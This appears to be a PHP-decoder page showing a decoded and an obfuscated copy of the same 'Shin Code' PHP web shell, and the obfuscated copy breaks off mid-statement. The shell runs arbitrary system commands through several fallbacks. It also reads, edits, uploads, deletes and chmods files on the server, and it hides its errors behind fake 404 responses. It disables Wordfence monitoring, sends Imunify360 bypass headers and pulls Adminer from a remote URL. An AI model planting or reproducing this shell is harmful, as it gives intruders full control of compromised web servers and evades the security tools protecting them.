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PHP Decode
<?php goto lMvc0; Ipi2T: echo @get_current_user() . "\100" . @$_SERVER["REMOTE_ADDDR"] ...
Decoded Output download
goto lMvc0; Ipi2T: echo @get_current_user() . "@" . @$_SERVER["REMOTE_ADDDR"] . ": ~ \$"; goto aS54Z; jguok: function readFileContent($file) { return file_get_contents($file); } goto LBLrd; kPTzQ: ?>
</select></ul></div><div class="info-container"><h2>User Info</h2><ul class="info-list"><li>Username:<?php goto GxRmV; rJcJZ: if (isset($_GET["dir"])) { changeDirectory($_GET["dir"]); $currentDirectory = getCurrentDirectory(); } goto JB0VT; VZDmD: echo $_SERVER["SERVER_SOFTWARE"]; goto sNC01; RwfwJ: @http_response_code(500); goto IYTYv; KdiBq: function showBreadcrumb($path) { $path = str_replace("\", "/", $path); $paths = explode("/", $path); ?>
<div class="breadcrumb"><?php foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { ?>
DIR : <a href="?dir=/">/</a><?php } if ($pat == '') { continue; } $linkPath = implode("/", array_slice($paths, 0, $id + 1)); ?>
<a href="?dir=<?php echo urlencode($linkPath); ?>
"><?php echo $pat; ?>
</a>/<?php } ?>
</div><?php } goto aGTzE; qaWrW: echo @getmygid(); goto ZQIF4; bhNjc: function chmodRecursive($path, $permission) { if (is_dir($path)) { $items = scandir($path); if ($items === false) { return false; } foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $itemPath = $path . "/" . $item; if (is_dir($itemPath)) { if (!chmod($itemPath, $permission)) { return false; } if (!chmodRecursive($itemPath, $permission)) { return false; } } else { if (!chmod($itemPath, $permission)) { return false; } } } } else { if (!chmod($path, $permission)) { return false; } } return true; } goto LX07Z; DjmJv: if (isset($_GET["read"])) { $file = $_GET["read"]; $content = readFileContent($file); if ($content !== false) { echo "<div class=\"command-output">"; echo "<pre>" . htmlspecialchars($content) . "</pre>"; echo "</div>"; } else { echo "Failed to read the file."; } } goto vZNex; DpkS1: function deleteFile($file) { if (file_exists($file)) { if (unlink($file)) { return "File deleted successfully." . $file; } else { return "Error deleting file."; } } else { return "File does not exist."; } } goto S_VHB; JB0VT: if (isset($_GET["edit"])) { $file = $_GET["edit"]; $content = readFileContent($file); if ($_SERVER["REQUEST_METHOD"] === "POST") { $saved = saveFileContent($file); if ($saved) { $responseMessage = "File saved successfully." . $file; } else { $errorMessage = "Error saving file."; } } } goto cMHyv; rX2yR: @set_time_limit(0); goto nuZ9L; P2bE6: if (isset($_POST["cmd"])) { $cmdOutput = executeCommand($_POST["cmd"]); } goto IpcF4; GxRmV: echo @get_current_user(); goto gbYWm; Wfuv7: ?>
</li><li>Group ID:<?php goto qaWrW; EozqT: @http_response_code(404); goto RwfwJ; CSJIc: if (!empty($errorMessage)) { ?>
<p style="color:red"><?php echo $errorMessage; ?>
</p><?php } goto rVGLi; AczYk: ?>
</li><li>System:<?php goto TRkpW; lFI3y: ?>
<li>PHP Version:<?php goto SpuFr; VbQT7: echo @getmyuid(); goto Wfuv7; BwUnB: foreach ($features as $feature => $status) { ?>
<option value="<?php echo $feature; ?>
"><?php echo $feature . ": " . $status; ?>
</option><?php } goto kPTzQ; rVGLi: ?>
<hr><div class="upload-cmd-container"><div class="upload-form"><h2>Upload:</h2><form method="post"enctype="multipart/form-data"><input name="file"type="file"> <button class="button"type="submit"name="upload">Upload</button></form></div><div class="cmd-form"><h2>Command:</h2><form method="post"><?php goto Ipi2T; bXR2o: function changePermission($path) { if (!file_exists($path)) { return "File or directory does not exist."; } $permission = isset($_POST["permission"]) ? $_POST["permission"] : ''; if ($permission === '') { return "Invalid permission value."; } if (!is_dir($path) && !is_file($path)) { return "Cannot change permission. Only directories and files can have permissions modified."; } $parsedPermission = intval($permission, 8); if ($parsedPermission === 0) { return "Invalid permission value."; } if (chmodRecursive($path, $parsedPermission)) { return "Permission changed successfully."; } else { return "Error changing permission."; } } goto bhNjc; LX07Z: function renameFile($oldName, $newName) { if (file_exists($oldName)) { $directory = dirname($oldName); $newPath = $directory . "/" . $newName; if (rename($oldName, $newPath)) { return "File or folder renamed successfully."; } else { return "Error renaming file or folder."; } } else { return "File or folder does not exist."; } } goto DpkS1; NaRXx: if (function_exists("apache_request_headers")) { $apacheHeaders = apache_request_headers(); if (isset($apacheHeaders["X-Mod-Security"])) { header("X-Mod-Security: " . $apacheHeaders["X-Mod-Security"]); } } goto T6vc6; GICEq: if (function_exists("imunify3_request_headers") && defined("IMUNIFY3_VERSION")) { $imunifyHeaders = imunify360_request_headers(); if (isset($imunifyHeaders["X-Imunify360-Request"])) { header("X-Imunify360-Request: bypass"); } if (isset($imunifyHeaders["X-Imunify360-Captcha-Bypass"])) { header("X-Imunify3-Captcha-Bypass: " . $imunifyHeaders["X-Imunify360-Captcha-Bypass"]); } } goto NaRXx; eFRyN: echo @gethostname(); goto v_Nda; Uxn1c: echo $domainCount; goto AczYk; S_VHB: function deleteFolder($folder) { if (is_dir($folder)) { $files = glob($folder . "/*"); foreach ($files as $file) { is_dir($file) ? deleteFolder($file) : unlink($file); } if (rmdir($folder)) { return "Folder deleted successfully." . $folder; } else { return "Error deleting folder."; } } else { return "Folder does not exist."; } } goto J8uCk; CdqVm: function countDomainsInServer() { $serverName = $_SERVER["SERVER_NAME"]; $ipAddresses = @gethostbynamel($serverName); if ($ipAddresses !== false) { return count($ipAddresses); } else { return 0; } } goto YlTTC; v_Nda: ?>
</li><?php goto uWM9c; TMolC: if (isset($_POST["upload"])) { $responseMessage = uploadFile($currentDirectory); } goto P2bE6; daalW: if (function_exists("disk_total_space")) { ?>
<li>HDD Total Space:<?php echo @formatBytes(disk_total_space("/")); ?>
</li><li>HDD Free Space:<?php echo @formatBytes(disk_free_space("/")); ?>
</li><?php } goto JG1qL; IYTYv: function getFileDetails($path) { $folders = array(); $files = array(); try { $items = @scandir($path); if (!is_array($items)) { throw new Exception("Failed to scan directory"); } foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $itemPath = $path . "/" . $item; $itemDetails = array("name" => $item, "type" => is_dir($itemPath) ? "Folder" : "File", "size" => is_dir($itemPath) ? '' : formatSize(filesize($itemPath)), "permission" => substr(sprintf("%o", fileperms($itemPath)), -4)); if (is_dir($itemPath)) { $folders[] = $itemDetails; } else { $files[] = $itemDetails; } } return array_merge($folders, $files); } catch (Exception $e) { return "None"; } } goto ubNh5; gY3pL: $errorMessage = ''; goto A8vlv; fURDZ: if (isset($_GET["edit"])) { ?>
<div class="edit-file"><h2>Edit File:<?php echo basename($file); ?>
</h2><form method="post"><textarea cols="50"name="content"rows="10"><?php echo htmlspecialchars($content); ?>
</textarea><br><button class="button"type="submit">Save</button></form></div><?php } elseif (isset($_GET["chmod"])) { ?>
<div class="change-permission"><h2>Change Permission:<?php echo basename($file); ?>
</h2><form method="post"><input name="chmod"type="hidden"value="<?php echo urlencode($file); ?>
"> <input name="permission"placeholder="Enter permission (e.g., 0770)"> <button class="button"type="submit">Change</button></form></div><?php } goto eiNrv; oi85H: if (defined("WORDFENCE_VERSION")) { define("WORDFENCE_DISABLE_LIVE_TRAFFIC", true); define("WORDFENCE_DISABLE_FILE_MODS", true); } goto GICEq; LQARU: function getDirectoryArray($path) { $directories = explode("/", $path); $directoryArray = array(); $currentPath = ''; foreach ($directories as $directory) { if (!empty($directory)) { $currentPath .= "/" . $directory; $directoryArray[] = array("path" => $currentPath, "name" => $directory); } } return $directoryArray; } goto KdiBq; OTzQh: showFileTable($currentDirectory); goto V7Dxr; ubNh5: function formatSize($size) { $units = array("B", "KB", "MB", "GB", "TB"); $i = 0; while ($size >= 1024 && $i < 4) { $size /= 1024; $i++; } return round($size, 2) . " " . $units[$i]; } goto xY7vU; FOHdY: if (isset($_POST["Summon"])) { $baseUrl = ""; $currentPath = getCurrentDirectory(); $fileUrl = $baseUrl; $fileName = "Adminer.php"; $filePath = $currentPath . "/" . $fileName; $fileContent = @file_get_contents($fileUrl); if ($fileContent !== false) { if (file_put_contents($filePath, $fileContent) !== false) { $responseMessage = "File "" . $fileName . "" summoned successfully. <a href="" . $filePath . "\">" . $filePath . "</a>"; } else { $errorMessage = "Failed to save the summoned file."; } } else { $errorMessage = "Failed to fetch the file content. None File"; } } goto Y4All; H0Lu2: ?>
<ul class="info-list"><li>Hostname:<?php goto eFRyN; NuGGW: ?>
</li><li>Server Software:<?php goto VZDmD; ArH8W: @ini_set("max_execution_time", 0); goto qbVjM; VT3po: ?>
<!doctypehtml><html><head><title>404</title><link href=""rel="stylesheet"></head><body><div class="container"><h1>[ FILE MANAGEMENT ]</h1><div class="menu-icon"onclick="toggleSidebar()"></div><hr><div class="button-container"><form method="post"style="display:inline-block"><input name="Summon"type="submit"value="Adminer"class="summon-button"></form><button class="summon-button"type="button"onclick='window.location.href="?gas"'>Mail Test</button></div><?php goto HAv5D; SpuFr: echo @phpversion(); goto NuGGW; eiNrv: ?>
<hr><?php goto r4e6p; lMvc0: @ini_set("error_log", NULL); goto AkT8f; OYH6A: function changeDirectory($path) { if ($path === "..") { @chdir(".."); } else { @chdir($path); } } goto hMLCe; nuZ9L: @ob_clean(); goto tW71D; zJrNF: @http_response_code(403); goto EozqT; qbVjM: @error_reporting(0); goto rX2yR; aGTzE: function showFileTable($path) { $fileDetails = getFileDetails($path); ?>
<table><tr><th>Name</th><th>Type</th><th>Size</th><th>Permission</th><th>Actions</th></tr><?php if (is_array($fileDetails)) { foreach ($fileDetails as $fileDetail) { ?>
<tr><td><?php echo getLink($path . "/" . $fileDetail["name"], $fileDetail["name"]); ?>
</td><td><?php echo $fileDetail["type"]; ?>
</td><td><?php echo $fileDetail["size"]; ?>
</td><td><?php $permissionColor = is_writable($path . "/" . $fileDetail["name"]) ? "green" : "red"; ?>
<span style="color:<?php echo $permissionColor; ?>
"><?php echo $fileDetail["permission"]; ?>
</span></td><td><?php if ($fileDetail["type"] === "File") { ?>
<div class="dropdown"><button class="dropbtn">Actions</button><div class="dropdown-content"><a href="?dir=<?php echo urlencode($path); ?>
&edit=<?php echo urlencode($path . "/" . $fileDetail["name"]); ?>
">Edit</a> <a href="?dir=<?php echo urlencode($path); ?>
&rename=<?php echo urlencode($fileDetail["name"]); ?>
">Rename</a> <a href="?dir=<?php echo urlencode($path); ?>
&chmod=<?php echo urlencode($fileDetail["name"]); ?>
">Chmod</a> <a href="?dir=<?php echo urlencode($path); ?>
&delete=<?php echo urlencode($fileDetail["name"]); ?>
">Delete</a></div></div><?php } if ($fileDetail["type"] === "Folder") { ?>
<div class="dropdown"><button class="dropbtn">Actions</button><div class="dropdown-content"><a href="?dir=<?php echo urlencode($path); ?>
&rename=<?php echo urlencode($fileDetail["name"]); ?>
">Rename</a> <a href="?dir=<?php echo urlencode($path); ?>
&chmod=<?php echo urlencode($fileDetail["name"]); ?>
">Chmod</a> <a href="?dir=<?php echo urlencode($path); ?>
&delete=<?php echo urlencode($fileDetail["name"]); ?>
">Delete</a></div></div><?php } ?>
</td></tr><?php } } else { ?>
<tr><td colspan="5">None</td></tr><?php } ?>
</table><?php } goto bXR2o; YlTTC: $domainCount = @countDomainsInServer(); goto sp3v6; n6PwV: function getLink($path, $name) { if (is_dir($path)) { return "<a href="?dir=" . urlencode($path) . "">" . $name . "</a>"; } elseif (is_file($path)) { return "<a href="?dir=" . urlencode(dirname($path)) . "&read=" . urlencode($path) . "\">" . $name . "</a>"; } } goto LQARU; CgJeT: ?>
<label for="feature-select">Select Feature:</label> <select id="feature-select"><?php goto BwUnB; ZwJZX: if (isset($_GET["delete"])) { $file = $_GET["delete"]; if ($_SERVER["REQUEST_METHOD"] === "GET") { $currentDirectory = getCurrentDirectory(); if (is_file($file)) { $responseMessage = deleteFile($file); echo "<script>alert('File dihapus');window.location='?dir=" . urlencode($currentDirectory) . "';</script>"; die; } elseif (is_dir($file)) { $responseMessage = deleteFolder($file); echo "<script>alert('Folder dihapus');window.location='?dir=" . urlencode($currentDirectory) . "';</script>"; die; } else { $errorMessage = "File or folder does not exist."; } } } goto FOHdY; gbYWm: ?>
</li><li>User ID:<?php goto VbQT7; aS54Z: ?>
<input name="cmd"size="30"height="10"> <input type="submit"class="empty-button"></form></div></div><?php goto DjmJv; xY7vU: function executeCommand($command) { $currentDirectory = getCurrentDirectory(); $command = "cd {$currentDirectory} && {$command}"; $output = ''; $error = ''; $descriptors = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = @proc_open($command, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); $returnValue = proc_close($process); $output = trim($output); $error = trim($error); if ($returnValue === 0 && !empty($output)) { return $output; } elseif (!empty($error)) { return "Error: " . $error; } } $shellOutput = @shell_exec($command); if ($shellOutput !== null) { $output = trim($shellOutput); if (!empty($output)) { return $output; } } else { $error = error_get_last(); if (!empty($error)) { return "Error: " . $error["message"]; } } @exec($command, $execOutput, $execStatus); if ($execStatus === 0) { $output = implode(PHP_EOL, $execOutput); if (!empty($output)) { return $output; } } else { return "Error: Command execution failed."; } ob_start(); @passthru($command, $passthruStatus); $passthruOutput = ob_get_clean(); if ($passthruStatus === 0) { $output = $passthruOutput; if (!empty($output)) { return $output; } } else { return "Error: Command execution failed."; } ob_start(); @system($command, $systemStatus); $systemOutput = ob_get_clean(); if ($systemStatus === 0) { $output = $systemOutput; if (!empty($output)) { return $output; } } else { return "Error: Command execution failed."; } return "Error: Command execution failed."; } goto jguok; obNmC: echo date("Y"); goto yo4fq; JG1qL: ?>
<li>Total Domains in Server:<?php goto Uxn1c; hMLCe: function getCurrentDirectory() { return realpath(getcwd()); } goto n6PwV; zMsVB: if (!empty($responseMessage)) { ?>
<p style="color:green"class="response-message"><?php echo $responseMessage; ?>
</p><?php } goto Wkw3q; sp3v6: function formatBytes($bytes, $precision = 2) { $units = array("B", "KB", "MB", "GB", "TB"); $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= 1 << 10 * $pow; return round($bytes, $precision) . " " . $units[$pow]; } goto H0Lu2; IpcF4: if (isset($_GET["rename"])) { $file = $_GET["rename"]; if ($_SERVER["REQUEST_METHOD"] === "POST") { $newName = $_POST["new_name"]; if (is_file($file) || is_dir($file)) { $responseMessage = renameFile($file, $newName); } else { $errorMessage = "File or folder does not exist."; } } } goto ZwJZX; ZQIF4: ?>
</li></ul></div></div></div><script>function toggleOptionsMenu(){document.getElementById("optionsMenu").classList.toggle("show")}function toggleSidebar(){document.getElementById("sidebar").classList.toggle("open")}</script><div class="footer"><p><?php goto obNmC; LBLrd: function saveFileContent($file) { if (isset($_POST["content"])) { return file_put_contents($file, $_POST["content"]) !== false; } return false; } goto pNgcO; tW71D: @header("X-Accel-Buffering: no"); goto X7qh0; TRkpW: echo @php_uname(); goto F_Q0g; F_Q0g: ?>
</li></ul></div><div class="info-container"><h2>System Info</h2><ul class="info-list"><?php goto wwWhQ; uWM9c: if (isset($_SERVER["SERVER_ADDR"])) { ?>
<li>IP Address:<?php echo $_SERVER["SERVER_ADDR"]; ?>
</li><?php } goto lFI3y; HAv5D: if (isset($_GET["gas"])) { if ($_SERVER["REQUEST_METHOD"] === "POST") { if (!empty($_POST["email"])) { $xx = rand(); if (mail($_POST["email"], "Shin Mailer Test - " . $xx, "Shin Ganteng")) { echo "<b>Send a report to [" . $_POST["email"] . "] - {$xx}</b>"; } else { echo "Failed to send the email."; } } else { echo "Please provide an email address."; } } else { ?>
<h2>Mail Test :</h2><form method="post"><input name="email"placeholder="Enter email"required> <input type="submit"value="Send test "></form><?php } } goto CSJIc; r4e6p: echo "<h2>Filemanager</h2>"; goto Jx5RQ; T6vc6: if (isset($_SERVER["HTTP_CF_CONNECTING_IP"]) && defined("CLOUDFLARE_VERSION")) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_CF_CONNECTING_IP"]; if (isset($apacheHeaders["HTTP_CF_VISITOR"])) { header("HTTP_CF_VISITOR: " . $apacheHeaders["HTTP_CF_VISITOR"]); } } goto VT3po; vZNex: if (!empty($cmdOutput)) { ?>
<h3>Command Output:</h3><div class="command-output"><pre><?php echo htmlspecialchars($cmdOutput); ?>
</pre></div><?php } goto zMsVB; cMHyv: if (isset($_GET["chmod"])) { $file = $_GET["chmod"]; if ($_SERVER["REQUEST_METHOD"] === "POST") { $responseMessage = changePermission($file); } } goto TMolC; J8uCk: $currentDirectory = getCurrentDirectory(); goto gY3pL; pNgcO: function uploadFile($targetDirectory) { if (isset($_FILES["file"])) { $currentDirectory = getCurrentDirectory(); $targetFile = $targetDirectory . "/" . basename($_FILES["file"]["name"]); if ($_FILES["file"]["size"] === 0) { return "Open Ur Eyes Bitch !!!."; } else { if (move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) { return "File uploaded successfully."; } else { return "Error uploading file."; } } return ''; } } goto OYH6A; Y4All: if (function_exists("litespeed_request_headers")) { $headers = litespeed_request_headers(); if (isset($headers["X-LSCACHE"])) { header("X-LSCACHE: off"); } } goto oi85H; Wkw3q: if (isset($_GET["rename"])) { ?>
<div class="rename-form"><h2>Rename File or Folder:<?php echo basename($file); ?>
</h2><form method="post"><input name="new_name"placeholder="New Name"required><br><input type="submit"value="Rename"class="button"> <a href="?dir=<?php echo urlencode(dirname($file)); ?>
"class="button">Cancel</a></form></div><?php } goto fURDZ; Jx5RQ: showBreadcrumb($currentDirectory); goto OTzQh; A8vlv: $responseMessage = ''; goto rJcJZ; sNC01: ?>
</li><?php goto daalW; AkT8f: @ini_set("log_errors", 0); goto ArH8W; wwWhQ: $features = array("Safe Mode" => ini_get("safe_mode") ? "Enabled" : "Disabled", "Disable Functions" => ini_get("disable_functions"), "GCC" => function_exists("shell_exec") && shell_exec("gcc --version") ? "On" : "Off", "Perl" => function_exists("shell_exec") && shell_exec("perl --version") ? "On" : "Off", "Python Version" => ($pythonVersion = shell_exec("python --version")) ? "On (" . $pythonVersion . ")" : "Off", "PKEXEC Version" => ($pkexecVersion = shell_exec("pkexec --version")) ? "On (" . $pkexecVersion . ")" : "Off", "Curl" => function_exists("shell_exec") && shell_exec("curl --version") ? "On" : "Off", "Wget" => function_exists("shell_exec") && shell_exec("wget --version") ? "On" : "Off", "Mysql" => function_exists("shell_exec") && shell_exec("mysql --version") ? "On" : "Off", "Ftp" => function_exists("shell_exec") && shell_exec("ftp --version") ? "On" : "Off", "Ssh" => function_exists("shell_exec") && shell_exec("ssh --version") ? "On" : "Off", "Mail" => function_exists("shell_exec") && shell_exec("mail --version") ? "On" : "Off", "cron" => function_exists("shell_exec") && shell_exec("cron --version") ? "On" : "Off", "SendMail" => function_exists("shell_exec") && shell_exec("sendmail --version") ? "On" : "Off"); goto CgJeT; X7qh0: @header("Content-Encoding: none"); goto zJrNF; V7Dxr: ?>
</div><div class="sidebar"id="sidebar"><div class="sidebar-content"><div class="sidebar-close"><button onclick="toggleSidebar()">Close</button></div><div class="info-container"><h2>Server Info</h2><?php goto CdqVm; yo4fq: ?>
<a href="">Coded By</a> Shin Code.</p></div></body></html>
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Original Code
goto lMvc0; Ipi2T: echo @get_current_user() . "\100" . @$_SERVER["REMOTE_ADDDR"] . ": ~ \$"; goto aS54Z; jguok: function readFileContent($file) { return file_get_contents($file); } goto LBLrd; kPTzQ: ?>
</select></ul></div><div class="info-container"><h2>User Info</h2><ul class="info-list"><li>Username:<?php goto GxRmV; rJcJZ: if (isset($_GET["\144i\162"])) { changeDirectory($_GET["di\162"]); $currentDirectory = getCurrentDirectory(); } goto JB0VT; VZDmD: echo $_SERVER["\123\105\122\126ER_SO\106T\127AR\105"]; goto sNC01; RwfwJ: @http_response_code(500); goto IYTYv; KdiBq: function showBreadcrumb($path) { $path = str_replace("\134", "/", $path); $paths = explode("\57", $path); ?>
<div class="breadcrumb"><?php foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { ?>
DIR : <a href="?dir=/">/</a><?php } if ($pat == '') { continue; } $linkPath = implode("\57", array_slice($paths, 0, $id + 1)); ?>
<a href="?dir=<?php echo urlencode($linkPath); ?>
"><?php echo $pat; ?>
</a>/<?php } ?>
</div><?php } goto aGTzE; qaWrW: echo @getmygid(); goto ZQIF4; bhNjc: function chmodRecursive($path, $permission) { if (is_dir($path)) { $items = scandir($path); if ($items === false) { return false; } foreach ($items as $item) { if ($item == "." || $item == "\56\56") { continue; } $itemPath = $path . "\57" . $item; if (is_dir($itemPath)) { if (!chmod($itemPath, $permission)) { return false; } if (!chmodRecursive($itemPath, $permission)) { return false; } } else { if (!chmod($itemPath, $permission)) { return false; } } } } else { if (!chmod($path, $permission)) { return false; } } return true; } goto LX07Z; DjmJv: if (isset($_GET["r\145ad"])) { $file = $_GET["rea\144"]; $content = readFileContent($file); if ($content !== false) { echo "\74di\166\40\143\154a\163\163=\"\143\157m\155and\55\157\165\164\160\165\164\42\76"; echo "\74p\162e>" . htmlspecialchars($content) . "\74\57pre>"; echo "</\144\151\166\76"; } else { echo "Faile\144\40\164o\40r\145\141d\40the \146i\154\145\56"; } } goto vZNex; DpkS1: function deleteFile($file) { if (file_exists($file)) { if (unlink($file)) { return "File de\154\145ted s\165c\143e\163s\146\165lly." . $file; } else { return "Err\157r \144e\154e\164\151\156\147 \146\151\154\145."; } } else { return "\106i\154e\40\144\157es not \145\170ist."; } } goto S_VHB; JB0VT: if (isset($_GET["e\144it"])) { $file = $_GET["edi\164"]; $content = readFileContent($file); if ($_SERVER["\122EQU\105\123\124_\115E\124\110O\104"] === "\120OST") { $saved = saveFileContent($file); if ($saved) { $responseMessage = "Fil\145 sa\166\145\144\40s\165cc\145\163sf\165\154\154\171\56" . $file; } else { $errorMessage = "\105\162\162o\162\40\163aving fi\154e\56"; } } } goto cMHyv; rX2yR: @set_time_limit(0); goto nuZ9L; P2bE6: if (isset($_POST["\143\155d"])) { $cmdOutput = executeCommand($_POST["\143m\144"]); } goto IpcF4; GxRmV: echo @get_current_user(); goto gbYWm; Wfuv7: ?>
</li><li>Group ID:<?php goto qaWrW; EozqT: @http_response_code(404); goto RwfwJ; CSJIc: if (!empty($errorMessage)) { ?>
<p style="color:red"><?php echo $errorMessage; ?>
</p><?php } goto rVGLi; AczYk: ?>
</li><li>System:<?php goto TRkpW; lFI3y: ?>
<li>PHP Version:<?php goto SpuFr; VbQT7: echo @getmyuid(); goto Wfuv7; BwUnB: foreach ($features as $feature => $status) { ?>
<option value="<?php echo $feature; ?>
"><?php echo $feature . ":\40" . $status; ?>
</option><?php } goto kPTzQ; rVGLi: ?>
<hr><div class="upload-cmd-container"><div class="upload-form"><h2>Upload:</h2><form method="post"enctype="multipart/form-data"><input name="file"type="file"> <button class="button"type="submit"name="upload">Upload</button></form></div><div class="cmd-form"><h2>Command:</h2><form method="post"><?php goto Ipi2T; bXR2o: function changePermission($path) { if (!file_exists($path)) { return "\106\151l\145 \157\162 \144ir\145ct\157ry \144o\145s n\157t\40\145x\151\163\164\56"; } $permission = isset($_POST["p\145\162mis\163ion"]) ? $_POST["pe\162m\151ss\151o\156"] : ''; if ($permission === '') { return "I\156\166a\154id \160e\162\155\151s\163\151\157n \166\141l\165\145."; } if (!is_dir($path) && !is_file($path)) { return "Canno\164 \143h\141\156\147e\40per\155\151ssio\156\56\40\117n\154y \144\151\162\145ctori\145\163\40\141\156\144 \146\151le\163\40ca\156\40ha\166\145 pe\162m\151\163s\151\157\156s \155\157\144\151\146\151e\144."; } $parsedPermission = intval($permission, 8); if ($parsedPermission === 0) { return "In\166ali\144\40permi\163s\151on\40v\141lue."; } if (chmodRecursive($path, $parsedPermission)) { return "Per\155\151\163s\151on c\150an\147ed\40succ\145ss\146ully\56"; } else { return "Er\162o\162\40ch\141\156g\151ng\40\160er\155is\163\151on\56"; } } goto bhNjc; LX07Z: function renameFile($oldName, $newName) { if (file_exists($oldName)) { $directory = dirname($oldName); $newPath = $directory . "/" . $newName; if (rename($oldName, $newPath)) { return "\106\151le \157\162\40f\157\154de\162\40\162en\141\155ed s\165\143c\145\163s\146\165l\154y."; } else { return "E\162\162or\40re\156\141\155i\156\147\40f\151\154e or \146ol\144e\162\56"; } } else { return "F\151\154\145\40o\162\40\146olde\162 do\145\163\40not \145xi\163t\56"; } } goto DpkS1; NaRXx: if (function_exists("ap\141\143\150e_re\161u\145s\164_h\145ade\162\163")) { $apacheHeaders = apache_request_headers(); if (isset($apacheHeaders["X-\115\157\144-\123ecuri\164y"])) { header("X-Mod-S\145\143u\162it\171: " . $apacheHeaders["\130\55M\157\144-\123\145\143u\162\151\164y"]); } } goto T6vc6; GICEq: if (function_exists("\151\155u\156\151\146y3\660\137\162\145\161\165e\163\164\137h\145\141der\163") && defined("I\115U\116I\106\131\63\660_\126E\122\123ION")) { $imunifyHeaders = imunify360_request_headers(); if (isset($imunifyHeaders["X-\111\155\165\156\151\146\171\63\66\60\55R\145\161\165\145\163t"])) { header("X\55I\155\165nify36\60\55\122\145\161\165e\163t\72\40\142ypas\163"); } if (isset($imunifyHeaders["X\55\111\155un\151\146\171360-\103a\160\164\143ha\55\102\171\160as\163"])) { header("\130\55\111\155\165\156ify3\660-C\141\160\164\143\150a\55\102\171\160\141s\163:\40" . $imunifyHeaders["\130-\111\155\165\156\151\146y\63\66\60-Capt\143ha-\102\171p\141\163s"]); } } goto NaRXx; eFRyN: echo @gethostname(); goto v_Nda; Uxn1c: echo $domainCount; goto AczYk; S_VHB: function deleteFolder($folder) { if (is_dir($folder)) { $files = glob($folder . "/\52"); foreach ($files as $file) { is_dir($file) ? deleteFolder($file) : unlink($file); } if (rmdir($folder)) { return "Fold\145\162\40\144el\145\164\145d suc\143\145ss\146ull\171." . $folder; } else { return "\105rror d\145\154\145\164\151\156g fo\154d\145r."; } } else { return "\106o\154d\145\162\40\144\157e\163 not e\170is\164\56"; } } goto J8uCk; CdqVm: function countDomainsInServer() { $serverName = $_SERVER["\123\105\122\126\105\122\137N\101M\105"]; $ipAddresses = @gethostbynamel($serverName); if ($ipAddresses !== false) { return count($ipAddresses); } else { return 0; } } goto YlTTC; v_Nda: ?>
</li><?php goto uWM9c; TMolC: if (isset($_POST["\165\160l\157\141\144"])) { $responseMessage = uploadFile($currentDirectory); } goto P2bE6; daalW: if (function_exists("\144isk\137\164ota\154_\163pa\143\145")) { ?>
<li>HDD Total Space:<?php echo @formatBytes(disk_total_space("\57")); ?>
</li><li>HDD Free Space:<?php echo @formatBytes(disk_free_space("/")); ?>
</li><?php } goto JG1qL; IYTYv: function getFileDetails($path) { $folders = array(); $files = array(); try { $items = @scandir($path); if (!is_array($items)) { throw new Exception("F\141\151le\144 \164o\40\163c\141\156 dire\143\164\157ry"); } foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $itemPath = $path . "/" . $item; $itemDetails = array("\156\141m\145" => $item, "\164yp\145" => is_dir($itemPath) ? "\106\157l\144e\162" : "File", "\163i\172e" => is_dir($itemPath) ? '' : formatSize(filesize($itemPath)), "\160er\155\151\163s\151\157n" => substr(sprintf("\45o", fileperms($itemPath)), -4)); if (is_dir($itemPath)) { $folders[] = $itemDetails; } else { $files[] = $itemDetails; } } return array_merge($folders, $files); } catch (Exception $e) { return "No\156e"; } } goto ubNh5; gY3pL: $errorMessage = ''; goto A8vlv; fURDZ: if (isset($_GET["e\144it"])) { ?>
<div class="edit-file"><h2>Edit File:<?php echo basename($file); ?>
</h2><form method="post"><textarea cols="50"name="content"rows="10"><?php echo htmlspecialchars($content); ?>
</textarea><br><button class="button"type="submit">Save</button></form></div><?php } elseif (isset($_GET["\143hm\157\144"])) { ?>
<div class="change-permission"><h2>Change Permission:<?php echo basename($file); ?>
</h2><form method="post"><input name="chmod"type="hidden"value="<?php echo urlencode($file); ?>
"> <input name="permission"placeholder="Enter permission (e.g., 0770)"> <button class="button"type="submit">Change</button></form></div><?php } goto eiNrv; oi85H: if (defined("WOR\104\106\105\116\103\105_VERS\111\117\116")) { define("\127\117R\104\106ENC\105\137DI\123AB\114E_L\111\126E\137T\122AF\106\111C", true); define("W\117\122DFE\116\103\105\137\104\111\123ABLE\137FIL\105_\115\117DS", true); } goto GICEq; LQARU: function getDirectoryArray($path) { $directories = explode("/", $path); $directoryArray = array(); $currentPath = ''; foreach ($directories as $directory) { if (!empty($directory)) { $currentPath .= "\57" . $directory; $directoryArray[] = array("p\141\164\150" => $currentPath, "\156\141\155\145" => $directory); } } return $directoryArray; } goto KdiBq; OTzQh: showFileTable($currentDirectory); goto V7Dxr; ubNh5: function formatSize($size) { $units = array("B", "KB", "\115B", "\107B", "\124\102"); $i = 0; while ($size >= 1024 && $i < 4) { $size /= 1024; $i++; } return round($size, 2) . "\40" . $units[$i]; } goto xY7vU; FOHdY: if (isset($_POST["\123umm\157n"])) { $baseUrl = "\150\164\164p\163\72/\57\147\151\164\150\165\142\56\143\157\155/v\162a\156a\57\141\144m\151ne\162/r\145\154eases/do\167nl\157a\144\57\1664\568\561/\141dm\151n\145r-\64\568.1.\160h\160"; $currentPath = getCurrentDirectory(); $fileUrl = $baseUrl; $fileName = "\101\144\155iner.\160h\160"; $filePath = $currentPath . "\57" . $fileName; $fileContent = @file_get_contents($fileUrl); if ($fileContent !== false) { if (file_put_contents($filePath, $fileContent) !== false) { $responseMessage = "\106\151le\40\42" . $fileName . "\42\40\163\165\155m\157\156\145d \163uc\143\145\163\163fu\154ly.\40\74\141 h\162e\146\75\42" . $filePath . "\">" . $filePath . "\74\57a\76"; } else { $errorMessage = "F\141ile\144 to \163ave\40the \163u\155\155\157ne\144\40fi\154\145."; } } else { $errorMessage = "F\141il\145\144\40\164o\40f\145tc\150 \164h\145\40\146i\154\145\40c\157\156\164en\164\56\40No\156e \106\151l\145"; } } goto 